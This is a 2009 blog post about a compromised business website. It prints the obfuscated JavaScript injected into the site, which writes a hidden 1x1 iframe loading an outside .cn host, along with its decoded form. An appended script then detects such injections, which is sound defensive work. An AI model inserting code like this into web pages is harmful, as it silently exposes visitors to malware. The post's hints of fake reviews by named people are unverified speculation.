More to the Story

Uncategorized January 12th, 2009

Hmmm, after a little bit more checking it looks like Brad and his website were the host of some rather curious pages. I wonder if he even knew about them?

http://web.archive.org/web/*/instrumentsolutions.com.au/*

Check out the spammy pages. When I did a bit of a Google search for those pages they were spammed out like crazy. Whoever got access to their site had posted spam on their site and then proceeded to gain 100s of spammy links to those pages.

Google Results

Another Good Story

Uncategorized January 12th, 2009

Going through the logs I see some unusual stuff, so while I am checking that out I find that http://www.webhostingstuff.com/review/MDWebHosting.html has had a few updates to its reviews. Now all these reviews are within a close-knit span of time: 1 on the 3rd December 2008, 2 on the 4th December 2008, 1 on the 9th December 2008, and finally 1 on the 12th December (now this looks suss to me, but who am I to argue). All these kind souls may have felt the need to put in positive reviews all at the same time. I don’t own the site and don’t have access to the IP logs, so I am sure the owners of webhostingstuff looked into it and saw they were legit?

Anyways, back to my story. The post on the 12th of December was from Brad (instrumentsolutions.com.au). Now, as far as I can tell (and I could be wrong), Brad is a director, designer and technical support for the domain and business. He gives MD Web Hosting a glowing report: 5 stars for Overall Rating, Uptime & Reliability, Technical Support and Customer Service. He must be very happy with MD Web Hosting.

Now you must be saying “SO WHAT”. Well, the interesting thing is I wonder who injected malicious code into their domain. Was it:

  • Someone hacked their site? Are they using a sloppy script?
  • Brad put it in there for some reason? Why would you?
  • Or did someone hack the MD Web Hosting server and inject the code?

Now I am not sure who put it in there; luckily the infection has been neutralised. I am sure from past interactions with MD that they will blame Brad for this problem.

The offending code has been obfuscated:

<script type="text/javascript"><!--
document.write(unescape('%3c%69%
66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%68%6f
%73%74%69%6e%67%6d%64%2e%63%6e%2f%73%2f%6f%75%74%2e%70%68%70
%3f%73%5f%69%64%3d%31%22%20%77%69%64%74%68%3d%31%20%68%65%69
%67%68%74%3d%31%20%73%74%79%6c%65%3d%22%76%69%73%69%62%69%6c
%69%74%79%3a%20%68%69%64%64%65%6e%22%3e%3c%2f%69%66%72%61%6d
%65%3e'))
// -->


Which in turn produces this iframe:

<script type="text/javascript"><!--
document.write(unescape('<iframe src="http://hostingmd.cn/s/out.php?s_id=1"
width=1 height=1 style="visibility: hidden">
</iframe>'))
// -->


I wonder, should I send an email? Is it worth it?
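
The manual decoding shown above can be automated when sweeping a site's files for this kind of injection. The following is an added example, not part of the original post: it finds unescape('...') string literals, decodes them, and flags any iframe a visitor could not see. The function names and the sample page (which points at the placeholder host example.invalid) are constructed for illustration.

```javascript
// Added example: static scan for the injection pattern shown in this post.
// Function names and SAMPLE_PAGE are constructed for illustration.

// Decode %XX and %uXXXX like legacy unescape(); stray '%' is left alone, never throws.
function legacyUnescape(s) {
  return s.replace(/%u([0-9a-f]{4})|%([0-9a-f]{2})/gi,
    (_, u, h) => String.fromCharCode(parseInt(u || h, 16)));
}

// Read one attribute (double-quoted, single-quoted or bare) from a tag's source text.
function attr(tag, name) {
  const m = new RegExp('\\s' + name + '\\s*=\\s*(?:"([^"]*)"|\'([^\']*)\'|([^\\s>]+))', 'i').exec(tag);
  return m ? (m[1] ?? m[2] ?? m[3]) : null;
}

// An iframe the visitor cannot see: width/height of 0 or 1, or hidden by inline style.
function isHidden(tag) {
  const tiny = ['width', 'height'].some(n => {
    const v = attr(tag, n);
    return v !== null && parseInt(v, 10) <= 1;
  });
  const style = (attr(tag, 'style') || '').replace(/\s+/g, '').toLowerCase();
  return tiny || style.includes('visibility:hidden') || style.includes('display:none');
}

// Find unescape('...') literals, decode them, and report every iframe inside.
function findObfuscatedIframes(html) {
  const findings = [];
  const call = /unescape\(\s*(['"])((?:(?!\1).)*)\1\s*\)/gis;
  for (const m of html.matchAll(call)) {
    // Copies pasted into blogs or e-mails often wrap the payload across lines.
    const decoded = legacyUnescape(m[2].replace(/[\r\n]+/g, ''));
    for (const t of decoded.matchAll(/<iframe\b[^>]*>/gi)) {
      findings.push({ src: attr(t[0], 'src'), hidden: isHidden(t[0]), offset: m.index });
    }
  }
  return findings;
}

// Constructed sample: a fully percent-encoded hidden iframe next to a normal, visible one.
const encodeAll = s => [...s].map(c => '%' + c.charCodeAt(0).toString(16).padStart(2, '0')).join('');
const SAMPLE_PAGE = '<p>Welcome</p><script type="text/javascript"><!--\n' +
  "document.write(unescape('" +
  encodeAll('<iframe src="http://example.invalid/s/out.php?s_id=1" width=1 height=1 style="visibility: hidden"></iframe>') +
  "'))\n// --></script>" +
  '<iframe src="/map.html" width=600 height=400></iframe>';

console.log(findObfuscatedIframes(SAMPLE_PAGE));
```

Only iframes hidden behind an unescape() call are reported, so the ordinary visible iframe in the sample is ignored; a finding with hidden set to true is the pattern from this post.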